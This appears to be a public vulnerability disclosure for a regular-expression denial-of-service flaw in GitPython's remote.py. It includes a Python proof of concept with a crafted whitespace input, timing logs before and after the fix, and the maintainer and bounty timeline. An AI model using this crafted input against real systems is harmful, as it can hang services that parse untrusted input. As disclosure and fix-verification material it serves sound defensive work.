Inefficient Regular Expression Complexity in gitpython-developers/gitpython

Valid

Reported on

Feb 10th 2022

Description

In the latest version of GitPython (cd29f07b) I discovered regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service)

Proof of Concept

PoC based on code in git/remote.py

import logging
import re

logging.basicConfig(format='%(asctime)s - %(levelname)s: %(message)s',
                    level=logging.DEBUG)

pattern = re.compile(r'^\s*(.) (\[?[\w\s\.$@]+\]?)\s+(.+) -> ([^\s]+)(    \(.*\)?$)?')

for i in range(1, 10000):
    s = ' ' * i * 100 + '->'
    logging.debug('Started with {} spaces'.format(i * 100))
    pattern.match(s)
    logging.debug('Finished with {} spaces'.format(i * 100))

Output:

2022-02-10 21:05:36,247 - DEBUG: Started with 100 spaces
2022-02-10 21:05:36,326 - DEBUG: Finished with 100 spaces
2022-02-10 21:05:36,326 - DEBUG: Started with 200 spaces
2022-02-10 21:05:38,765 - DEBUG: Finished with 200 spaces
2022-02-10 21:05:38,765 - DEBUG: Started with 300 spaces
2022-02-10 21:05:50,383 - DEBUG: Finished with 300 spaces
2022-02-10 21:05:50,383 - DEBUG: Started with 400 spaces
2022-02-10 21:06:22,743 - DEBUG: Finished with 400 spaces
2022-02-10 21:06:22,743 - DEBUG: Started with 500 spaces
2022-02-10 21:07:41,996 - DEBUG: Finished with 500 spaces
2022-02-10 21:07:41,997 - DEBUG: Started with 600 spaces
2022-02-10 21:10:23,773 - DEBUG: Finished with 600 spaces
2022-02-10 21:10:23,774 - DEBUG: Started with 700 spaces
2022-02-10 21:15:21,380 - DEBUG: Finished with 700 spaces
2022-02-10 21:15:21,380 - DEBUG: Started with 800 spaces
2022-02-10 21:23:46,983 - DEBUG: Finished with 800 spaces

Impact

This issues may lead to a denial of service if user controls input passed to pattern matching function.

Occurrences

We are processing your report and will contact the gitpython-developers/gitpython team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the gitpython-developers/gitpython team and are waiting to hear back a year ago
gitpython-developers/gitpython maintainer validated this vulnerability a year ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the gitpython-developers/gitpython team. We will try again in 7 days. a year ago
gitpython-developers/gitpython maintainer
a year ago

Maintainer

Please set this issue to 'needs help' so the system can stop sending reminders of a fix that I am not working on. Thank you.

Jamie Slome
a year ago

Admin

@theworstcomrade - can you support the creation of a fix here?

theworstcomrade submitted a
patch
a year ago
theworstcomrade
a year ago

Researcher

@admin @maintainer sorry for Your wait. Please check my fix. I ran it with builtin tests and with my testing script, all looked good.

2022-02-18 16:28:43,250 - DEBUG: Started with 100 spaces
2022-02-18 16:28:43,250 - DEBUG: Finished with 100 spaces
2022-02-18 16:28:43,250 - DEBUG: Started with 200 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 200 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 300 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 300 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 400 spaces
2022-02-18 16:28:43,251 - DEBUG: Finished with 400 spaces
2022-02-18 16:28:43,251 - DEBUG: Started with 500 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 500 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 600 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 600 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 700 spaces
2022-02-18 16:28:43,252 - DEBUG: Finished with 700 spaces
2022-02-18 16:28:43,252 - DEBUG: Started with 800 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 800 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 900 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 900 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 1000 spaces
2022-02-18 16:28:43,253 - DEBUG: Finished with 1000 spaces
2022-02-18 16:28:43,253 - DEBUG: Started with 1100 spaces
2022-02-18 16:28:43,254 - DEBUG: Finished with 1100 spaces
2022-02-18 16:28:43,254 - DEBUG: Started with 1200 spaces
2022-02-18 16:28:43,254 - DEBUG: Finished with 1200 spaces
2022-02-18 16:28:43,254 - DEBUG: Started with 1300 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1300 spaces
2022-02-18 16:28:43,255 - DEBUG: Started with 1400 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1400 spaces
2022-02-18 16:28:43,255 - DEBUG: Started with 1500 spaces
2022-02-18 16:28:43,255 - DEBUG: Finished with 1500 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1600 spaces
2022-02-18 16:28:43,256 - DEBUG: Finished with 1600 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1700 spaces
2022-02-18 16:28:43,256 - DEBUG: Finished with 1700 spaces
2022-02-18 16:28:43,256 - DEBUG: Started with 1800 spaces
2022-02-18 16:28:43,257 - DEBUG: Finished with 1800 spaces
Jamie Slome
a year ago

Admin

@theworstcomrade - great 👍

gitpython-developers/gitpython maintainer
a year ago

Maintainer

Thanks a lot for the help! What would the next step be to be able to confirm this as fix?

Jamie Slome
a year ago

Admin

Just hit the green confirm fix button on the right, and fill in the modal.

Also, be sure to select @theworstcomrade as the fixer when filling out the form. Let me know if you have any questions.

gitpython-developers/gitpython maintainer marked this as fixed in 3.1.27 with commit 75f4f6 a year ago
theworstcomrade has been awarded the fix bounty
This vulnerability will not receive a CVE
remote.py#L276 has been validated
to join this conversation